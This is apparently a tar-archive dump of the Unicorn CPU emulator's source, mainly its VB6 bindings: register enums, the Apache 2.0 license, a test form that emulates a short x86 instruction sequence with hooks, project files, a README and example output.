GS = 33, IP = 34, RAX = 35, RBP = 36, RBX = 37, RCX = 38, RDI = 39, RDX = 40, RIP = 41, RSI = 43, RSP = 44, SI = 45, SIL = 46, SP = 47, SPL = 48, SS = 49, CR0 = 50, CR1 = 51, CR2 = 52, CR3 = 53, CR4 = 54, CR8 = 58, DR0 = 66, DR1 = 67, DR2 = 68, DR3 = 69, DR4 = 70, DR5 = 71, DR6 = 72, DR7 = 73, FP0 = 82, FP1 = 83, FP2 = 84, FP3 = 85, FP4 = 86, FP5 = 87, FP6 = 88, FP7 = 89, K0 = 90, K1 = 91, K2 = 92, K3 = 93, K4 = 94, K5 = 95, K6 = 96, K7 = 97, MM0 = 98, MM1 = 99, MM2 = 100, MM3 = 101, MM4 = 102, MM5 = 103, MM6 = 104, MM7 = 105, R8 = 106, R9 = 107, R10 = 108, R11 = 109, R12 = 110, R13 = 111, R14 = 112, R15 = 113, ST0 = 114, ST1 = 115, ST2 = 116, ST3 = 117, ST4 = 118, ST5 = 119, ST6 = 120, ST7 = 121, XMM0 = 122, XMM1 = 123, XMM2 = 124, XMM3 = 125, XMM4 = 126, XMM5 = 127, XMM6 = 128, XMM7 = 129, XMM8 = 130, XMM9 = 131, XMM10 = 132, XMM11 = 133, XMM12 = 134, XMM13 = 135, XMM14 = 136, XMM15 = 137, XMM16 = 138, XMM17 = 139, XMM18 = 140, XMM19 = 141, XMM20 = 142, XMM21 = 143, XMM22 = 144, XMM23 = 145, XMM24 = 146, XMM25 = 147, XMM26 = 148, XMM27 = 149, XMM28 = 150, XMM29 = 151, XMM30 = 152, XMM31 = 153, YMM0 = 154, YMM1 = 155, YMM2 = 156, YMM3 = 157, YMM4 = 158, YMM5 = 159, YMM6 = 160, YMM7 = 161, YMM8 = 162, YMM9 = 163, YMM10 = 164, YMM11 = 165, YMM12 = 166, YMM13 = 167, YMM14 = 168, YMM15 = 169, YMM16 = 170, YMM17 = 171, YMM18 = 172, YMM19 = 173, YMM20 = 174, YMM21 = 175, YMM22 = 176, YMM23 = 177, YMM24 = 178, YMM25 = 179, YMM26 = 180, YMM27 = 181, YMM28 = 182, YMM29 = 183, YMM30 = 184, YMM31 = 185, ZMM0 = 186, ZMM1 = 187, ZMM2 = 188, ZMM3 = 189, ZMM4 = 190, ZMM5 = 191, ZMM6 = 192, ZMM7 = 193, ZMM8 = 194, ZMM9 = 195, ZMM10 = 196, ZMM11 = 197, ZMM12 = 198, ZMM13 = 199, ZMM14 = 200, ZMM15 = 201, ZMM16 = 202, ZMM17 = 203, ZMM18 = 204, ZMM19 = 205, ZMM20 = 206, ZMM21 = 207, ZMM22 = 208, ZMM23 = 209, ZMM24 = 210, ZMM25 = 211, ZMM26 = 212, ZMM27 = 213, ZMM28 = 214, ZMM29 = 215, ZMM30 = 216, ZMM31 = 217, R8B = 218, R9B = 219, R10B = 220, R11B = 221, R12B = 222, R13B = 223, R14B = 224, R15B = 225, R8D = 226, R9D = 227, R10D = 228, R11D = 229, R12D = 230, R13D = 231, R14D = 232, R15D = 233, R8W = 234, R9W = 235, R10W = 236, R11W = 237, R12W = 238, R13W = 239, R14W = 240, R15W = 241, IDTR = 242, GDTR = 243, LDTR = 244, TR = 245, FPCW = 246, FPTAG = 247, MSR = 248, MXCSR = 249, FS_BASE = 250, GS_BASE = 251, FLAGS = 252, RFLAGS = 253, FIP = 254, FCS = 255, FDP = 256, FDS = 257, FOP = 258, ENDING = 259, } impl From<RegisterX86> for i32 { fn from(r: RegisterX86) -> Self { r as i32 } } #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] #[allow(clippy::upper_case_acronyms)] pub enum InsnX86 { IN = 218, OUT = 500, SYSCALL = 699, SYSENTER = 700, RET = 151, } #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] #[allow(clippy::upper_case_acronyms)] pub enum InsnSysX86 { SYSCALL = InsnX86::SYSCALL as isize, SYSENTER = InsnX86::SYSENTER as isize, } #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub struct X86Mmr { pub selector: u64, pub base: u64, pub limit: u32, pub flags: u32, } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum X86CpuModel { UC_CPU_X86_QEMU64 = 0, UC_CPU_X86_PHENOM, UC_CPU_X86_CORE2DUO, UC_CPU_X86_KVM64, UC_CPU_X86_QEMU32, UC_CPU_X86_KVM32, UC_CPU_X86_COREDUO, UC_CPU_X86_486, UC_CPU_X86_PENTIUM, UC_CPU_X86_PENTIUM2, UC_CPU_X86_PENTIUM3, UC_CPU_X86_ATHLON, UC_CPU_X86_N270, UC_CPU_X86_CONROE, UC_CPU_X86_PENRYN, UC_CPU_X86_NEHALEM, UC_CPU_X86_WESTMERE, UC_CPU_X86_SANDYBRIDGE, UC_CPU_X86_IVYBRIDGE, UC_CPU_X86_HASWELL, UC_CPU_X86_BROADWELL, UC_CPU_X86_SKYLAKE_CLIENT, UC_CPU_X86_SKYLAKE_SERVER, UC_CPU_X86_CASCADELAKE_SERVER, UC_CPU_X86_COOPERLAKE, UC_CPU_X86_ICELAKE_CLIENT, UC_CPU_X86_ICELAKE_SERVER, UC_CPU_X86_DENVERTON, UC_CPU_X86_SNOWRIDGE, UC_CPU_X86_KNIGHTSMILL, UC_CPU_X86_OPTERON_G1, UC_CPU_X86_OPTERON_G2, UC_CPU_X86_OPTERON_G3, UC_CPU_X86_OPTERON_G4, UC_CPU_X86_OPTERON_G5, UC_CPU_X86_EPYC, UC_CPU_X86_DHYANA, UC_CPU_X86_EPYC_ROME, } impl From<X86CpuModel> for i32 { fn from(value: X86CpuModel) -> Self { value as i32 } } impl From<&X86CpuModel> for i32 { fn from(value: &X86CpuModel) -> Self { (*value) as i32 } } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/�������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015476�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/.gitattributes�����������������������������������������������������������0000664�0000000�0000000�00000000263�14675241067�0020372�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������*.frm eol=crlf *.bas eol=crlf *.cls eol=crlf *.ctl eol=crlf *.vbp eol=crlf *.txt eol=crlf *.cpp eol=crlf *.tli eol=crlf *.tlh eol=crlf *.vcproj eol=crlf *.sln eol=crlf ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/Apache_2.0_License.txt���������������������������������������������������0000664�0000000�0000000�00000026450�14675241067�0021450�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/CMemRegion.cls�����������������������������������������������������������0000664�0000000�0000000�00000002424�14675241067�0020170�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������VERSION 1.0 CLASS BEGIN MultiUse = -1 'True Persistable = 0 'NotPersistable DataBindingBehavior = 0 'vbNone DataSourceBehavior = 0 'vbNone MTSTransactionMode = 0 'NotAnMTSObject END Attribute VB_Name = "CMemRegion" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = True Attribute VB_PredeclaredId = False Attribute VB_Exposed = False 'this is for 32bit address space.. Public address As Long Public size As Long Public endsAt As Long Public perm As Long Function toString() As String toString = "Addr: " & Hex(address) & " Size: " & Hex(size) & " Perm: " & permToString() & " (" & Hex(perm) & ")" End Function 'Public Enum uc_prot ' UC_PROT_NONE = 0 ' UC_PROT_READ = 1 ' UC_PROT_WRITE = 2 ' UC_PROT_EXEC = 4 ' UC_PROT_ALL = 7 'End Enum Function permToString() As String If perm = 7 Then permToString = "All" Exit Function End If If perm = 0 Then permToString = "None" Exit Function End If If (perm And 1) = 1 Then permToString = "Read " If (perm And 2) = 2 Then permToString = permToString & "Write " If (perm And 4) = 4 Then permToString = permToString & "Exec" permToString = Trim(permToString) End Function ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/Form1.frm����������������������������������������������������������������0000664�0000000�0000000�00000021455�14675241067�0017177�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������VERSION 5.00 Begin VB.Form Form1 Caption = "Form1" ClientHeight = 6720 ClientLeft = 60 ClientTop = 345 ClientWidth = 14220 LinkTopic = "Form1" ScaleHeight = 6720 ScaleWidth = 14220 StartUpPosition = 2 'CenterScreen Begin VB.CommandButton Command1 Caption = "Copy" Height = 465 Left = 6180 TabIndex = 1 Top = 6150 Width = 1995 End Begin VB.ListBox List1 BeginProperty Font Name = "Courier New" Size = 11.25 Charset = 0 Weight = 400 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty Height = 5925 Left = 150 TabIndex = 0 Top = 120 Width = 13965 End End Attribute VB_Name = "Form1" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Option Explicit 'Contributed by: FireEye FLARE team 'Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com> 'License: Apache 2.0 Public WithEvents uc As ucIntel32 Attribute uc.VB_VarHelpID = -1 Dim hContext As Long 'test sample ported from: (requires unicorn 1.0 for success) ' https://github.com/unicorn-engine/unicorn/blob/master/tests/unit/test_pc_change.c ' https://github.com/unicorn-engine/unicorn/issues/210 Private Sub Form_Load() Dim ecx As Long, edx As Long Dim address As Long, size As Long, endAt As Long Dim b() As Byte, c As Collection, mem As CMemRegion Me.Visible = True 'you can set UNICORN_PATH global variable to load a specific dll, do this before initilizing the class Set uc = New ucIntel32 If uc.hadErr Then List1.AddItem uc.errMsg Exit Sub End If List1.AddItem "ucvbshim.dll loaded @" & Hex(uc.hLib) List1.AddItem "Unicorn version: " & uc.Version List1.AddItem "Disassembler available: " & uc.DisasmAvail If uc.major < 1 Then List1.AddItem "Change Eip in hook test requires >= v1.x for success" List1.AddItem "Unicorn x86 32bit engine handle: " & Hex(uc.uc) ' ReDim b(8) 'for clarity in what we are testing.. ' b(0) = &H41 ' inc ECX @0x1000000 ' b(1) = &H41 ' inc ECX ' b(2) = &H41 ' inc ECX ' b(3) = &H41 ' inc ECX @0x1000003 ' b(4) = &H41 ' inc ECX ' b(5) = &H41 ' inc ECX ' ' b(6) = &H42 ' inc EDX @0x1000006 ' b(7) = &H42 ' inc EDX ' #define X86_CODE32_MEM_WRITE "\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" // mov [0xaaaaaaaa], ecx; INC ecx; DEC edx 'we mash up two different test cases, first the change eip in hook test, then an invalid memory access 'note the format accepted by tobytes() is somewhat forgiving (always use 2char hex vals though) b() = toBytes("4141414141414242cc\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a") ecx = 3 edx = 15 address = &H1000000 size = &H200000 endAt = address + UBound(b) + 1 If Not uc.mapMem(address, size) Then List1.AddItem "Failed to map in 2mb memory " & uc.errMsg Exit Sub End If ' write machine code to be emulated to memory If Not uc.writeMem(address, b()) Then List1.AddItem "Failed to write code to memory " & uc.errMsg Exit Sub End If List1.AddItem "starts at: " & uc.disasm(address) Dim b2() As Byte If uc.readMem(address, b2, UBound(b) + 1) Then '+1 because ubound is 0 based.. List1.AddItem "readMem: " & HexDump(b2, 1) End If uc.reg32(ecx_r) = ecx uc.reg32(edx_r) = edx List1.AddItem "start values ECX = " & ecx & " EDX = " & edx ' trace all instructions uc.addHook hc_code, UC_HOOK_CODE uc.addHook hc_memInvalid, UC_HOOK_MEM_READ_UNMAPPED Or UC_HOOK_MEM_WRITE_UNMAPPED 'uc.removeHook UC_HOOK_MEM_READ_UNMAPPED Or UC_HOOK_MEM_WRITE_UNMAPPED uc.addHook hc_int, UC_HOOK_INTR List1.AddItem "beginning emulation.." If Not uc.startEmu(address, endAt) Then List1.AddItem uc.errMsg ecx = uc.reg32(ecx_r) edx = uc.reg8(dl_r) List1.AddItem "ECX: 6 =? " & ecx List1.AddItem "EDX: 17 =? " & edx List1.AddItem uc.dumpFlags If ecx <> 6 Then List1.AddItem "failed to change eip in hook!" ReDim b(100) 'this will handle mapping and alignment automatically.. uc.writeBlock &H2001, b(), UC_PROT_READ Or UC_PROT_WRITE List1.AddItem "Initilizing sharedMemory with: aabbccddeeff0011223344556677889900" sharedMemory() = toBytes("aabbccddeeff0011223344556677889900") ReDim Preserve sharedMemory(&H1000) 'must be 4k bytes aligned... If Not uc.mapMemPtr(sharedMemory, &H4000, UBound(sharedMemory)) Then List1.AddItem "Failed to map in host memory " & uc.errMsg Else Dim bb As Byte, ii As Integer, ll As Long If Not uc.writeByte(&H4001, &H41) Then List1.AddItem "Failed to write byte to shared mem" Else List1.AddItem "Wrote 0x41 to sharedMemory + 1" If uc.readByte(&H4001, bb) Then List1.AddItem "readByte = " & Hex(bb) End If 'uc.writeInt &H4001, &H4142 'If uc.readInt(&H4001, ii) Then List1.AddItem Hex(ii) 'uc.writeLong &H4001, &H11223344 'If uc.readLong(&H4001, ll) Then List1.AddItem Hex(ll) Erase b2 If uc.readMem(&H4000, b2, 20) Then List1.AddItem "emu read of sharedMemory: " & HexDump(b2, 1) Else List1.AddItem "Failed to readMem on sharedMemory " & uc.errMsg End If List1.AddItem "sanity checking host mem: " & HexDump(sharedMemory, 1, , 20) End If List1.AddItem "Enumerating memory regions..." Set c = uc.getMemMap() For Each mem In c List1.AddItem mem.toString() Next If hContext <> 0 Then List1.AddItem "trying to restore context.." If Not uc.restoreContext(hContext) Then List1.AddItem uc.errMsg List1.AddItem uc.regDump() List1.AddItem "beginning emulation.." If Not uc.startEmu(uc.eip, endAt) Then List1.AddItem uc.errMsg List1.AddItem uc.regDump() List1.AddItem "releasing saved context.." If Not uc.freeContext(hContext) Then List1.AddItem uc.errMsg End If Set mem = c(2) If Not uc.changePermissions(mem, UC_PROT_ALL) Then List1.AddItem "Failed to change permissions on second alloc " & uc.errMsg Else List1.AddItem "Changed permissions on second alloc to ALL" List1.AddItem "redumping memory regions to check..." Set c = uc.getMemMap() For Each mem In c List1.AddItem mem.toString() Next End If If uc.unMapMem(&H2000) Then List1.AddItem "Successfully unmapped new alloc" Else List1.AddItem "Failed to unmap alloc " & uc.errMsg End If List1.AddItem "Mem allocs count now: " & uc.getMemMap().count End Sub Private Sub Command1_Click() Clipboard.Clear Clipboard.SetText lbCopy(List1) End Sub Private Sub Form_Unload(Cancel As Integer) 'so IDE doesnt hang onto dll and we can recompile in development testing.. if you hit stop this benefit is lost.. 'do not use this in your real code, only for c dll development.. If uc.hLib <> 0 Then FreeLibrary uc.hLib End Sub Private Sub uc_CodeHook(ByVal address As Long, ByVal size As Long) List1.AddItem "> " & uc.disasm(address) If hContext = 0 And address = &H1000003 Then 'change the PC to "inc EDX" List1.AddItem "changing eip to skip last inc ecx's and saving context..." hContext = uc.saveContext() If hContext = 0 Then List1.AddItem "Failed to save context " & uc.errMsg uc.eip = &H1000006 End If End Sub Private Sub uc_Interrupt(ByVal intno As Long) List1.AddItem "Interrupt: " & intno End Sub Private Sub uc_InvalidMem(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long, continue As Boolean) 'continue defaults to false so we can ignore it unless we want to continue.. List1.AddItem "Invalid mem access address: " & Hex(address) & " size: " & Hex(size) & " type: " & memType2str(t) End Sub Private Sub uc_MemAccess(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long) List1.AddItem "mem access: address: " & Hex(address) & " size: " & Hex(size) & " type: " & memType2str(t) End Sub �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/Project1.vbp�������������������������������������������������������������0000664�0000000�0000000�00000001513�14675241067�0017676�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������Type=Exe Form=Form1.frm Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE Automation Module=uc_def; uc_def.bas Module=misc; misc.bas Class=ucIntel32; ucIntel32.cls Class=CMemRegion; CMemRegion.cls IconForm="Form1" Startup="Form1" HelpFile="" ExeName32="vb6Test.exe" Command32="" Name="Project1" HelpContextID="0" CompatibleMode="0" MajorVer=1 MinorVer=0 RevisionVer=0 AutoIncrementVer=0 ServerSupportFiles=0 VersionCompanyName="sandsprite" CompilationType=0 OptimizationType=0 FavorPentiumPro(tm)=0 CodeViewDebugInfo=-1 NoAliasing=0 BoundsCheck=0 OverflowCheck=0 FlPointCheck=0 FDIVCheck=0 UnroundedFP=0 StartMode=0 Unattended=0 Retained=0 ThreadPerObject=0 MaxNumberOfThreads=1 [MS Transaction Server] AutoRefresh=1 [fastBuild] fullPath=%ap%\vb6Test.exe �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/Project1.vbw�������������������������������������������������������������0000664�0000000�0000000�00000000262�14675241067�0017705�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������Form1 = 39, 35, 1148, 674, , 22, 22, 1090, 631, C uc_def = 56, 12, 1177, 758, misc = 44, 44, 1121, 685, ucIntel32 = 88, 33, 1136, 684, CMemRegion = 110, 110, 1026, 639, ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/README.txt���������������������������������������������������������������0000664�0000000�0000000�00000003420�14675241067�0017173�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ Unicorn engine bindings for VB6 A sample class for the 32bit x86 emulator is provided. Contributed by: FireEye FLARE team Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com> License: Apache 2.0 ' supported api: ' ucs_version ' ucs_arch_supported ' ucs_open ' ucs_close ' uc_reg_write ' uc_reg_read ' uc_mem_write ' UC_MEM_READ ' uc_emu_start ' uc_emu_stop ' ucs_hook_add ' uc_mem_map ' uc_hook_del ' uc_mem_regions ' uc_mem_map_ptr ' uc_context_alloc ' uc_free ' uc_context_save ' uc_context_restore ' uc_mem_unmap ' uc_mem_protect ' uc_strerror ' uc_errno ' ' supported hooks: ' UC_HOOK_CODE ' UC_HOOK_BLOCK ' memory READ/WRITE/FETCH ' invalid memory access ' interrupts ' ' bonus: ' disasm_addr (conditional compile - uses libdasm) ' mem_write_block (map and write data auto handles alignment) ' get_memMap (wrapper for uc_mem_regions) ' dependancies: (all in same directory or unicorn package in %windir%) vb6Test.exe ucvbshim.dll _ unicorn.dll - libgcc_s_dw2-1.dll \ libiconv-2.dll \__ unicorn package libintl-8.dll / libpcre-1.dll / libwinpthread-1.dll_- Notes: c dll was built using VS2008 build notes are included at the top of main.c this dll serves as a stdcall shim so vb6 can access the cdecl api and receive data from the callbacks. huge thanks to the unicorn and qemu authors who took on a gigantic task to create this library! ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/example_output.txt�������������������������������������������������������0000664�0000000�0000000�00000004426�14675241067�0021320�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ucvbshim.dll loaded @10000000 Unicorn version: 1.0 Disassembler available: True Unicorn x86 32bit engine handle: 853FD8 starts at: 01000000 41 inc ecx readMem: 4141414141414242CC890DAAAAAAAA414A start values ECX = 3 EDX = 15 beginning emulation.. > 01000000 41 inc ecx > 01000001 41 inc ecx > 01000002 41 inc ecx > 01000003 41 inc ecx changing eip to skip last inc ecx's and saving context... > 01000006 42 inc edx > 01000007 42 inc edx > 01000008 CC int3 Interrupt: 3 > 01000009 89 0D AA AA AA AA mov [0xaaaaaaaa],ecx Invalid mem access address: AAAAAAAA size: 4 type: Unmapped memory is written to Quit emulation due to WRITE on unmapped memory: uc_emu_start() ECX: 6 =? 6 EDX: 17 =? 17 EFL 4 P Initilizing sharedMemory with: aabbccddeeff0011223344556677889900 Wrote 0x41 to sharedMemory + 1 readByte = 41 emu read of sharedMemory: AA41CCDDEEFF0011223344556677889900000000 sanity checking host mem: AA41CCDDEEFF0011223344556677889900000000 Enumerating memory regions... Addr: 1000000 Size: 200000 Perm: All (7) Addr: 2000 Size: 1000 Perm: Read Write (3) Addr: 4000 Size: 1000 Perm: All (7) trying to restore context.. eax=0 ecx=6 edx=F ebx=0 esp=0 ebp=0 esi=0 edi=0 eip=1000003 eflags=0 EFL 0 beginning emulation.. > 01000003 41 inc ecx > 01000004 41 inc ecx > 01000005 41 inc ecx > 01000006 42 inc edx > 01000007 42 inc edx > 01000008 CC int3 Interrupt: 3 > 01000009 89 0D AA AA AA AA mov [0xaaaaaaaa],ecx Invalid mem access address: AAAAAAAA size: 4 type: Unmapped memory is written to Quit emulation due to WRITE on unmapped memory: uc_emu_start() eax=0 ecx=9 edx=11 ebx=0 esp=0 ebp=0 esi=0 edi=0 eip=1000009 eflags=4 EFL 4 P releasing saved context.. Changed permissions on second alloc to ALL redumping memory regions to check... Addr: 1000000 Size: 200000 Perm: All (7) Addr: 2000 Size: 1000 Perm: All (7) Addr: 4000 Size: 1000 Perm: All (7) Successfully unmapped new alloc Mem allocs count now: 2 ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/main.cpp�����������������������������������������������������������������0000664�0000000�0000000�00000031353�14675241067�0017133�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ /* stdcall unicorn engine shim layer for use with VB6 or C# code ripped from unicorn_dynload.c Contributed by: FireEye FLARE team Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com> License: Apache 2.0 Disassembler support can be optionally compiled in using: libdasm (c) 2004 - 2006 jt / nologin.org this project has been built with vs2008 precompiled binaries with disasm support available here: https://github.com/dzzie/libs/tree/master/unicorn_emu */ #include <io.h> #include <windows.h> #ifdef _WIN64 #error vb6 is 32bit only #endif #include <unicorn/unicorn.h> #pragma comment(lib, "unicorn.lib") //if you compile with VS2008 you will need to add stdint.h and inttypes.h to your compiler include directory //you can find examples here: https://github.com/dzzie/VS_LIBEMU/tree/master/libemu/include //if you want to include disassembler support: // 1) install libdasm in your compilers include directory // 2) add libdasm.h/.c to the project (drag and drop into VS project explorer), // 3) remove the comment from the define below. //The vb code detects the changes at runtime. //#define INCLUDE_DISASM #ifdef INCLUDE_DISASM #include <libdasm/libdasm.h> #endif #include "msvbvm60.tlh" //so we can use the vb6 collection object #define EXPORT comment(linker, "/EXPORT:"__FUNCTION__"="__FUNCDNAME__) enum hookCatagory{hc_code = 0, hc_block = 1, hc_inst = 2, hc_int 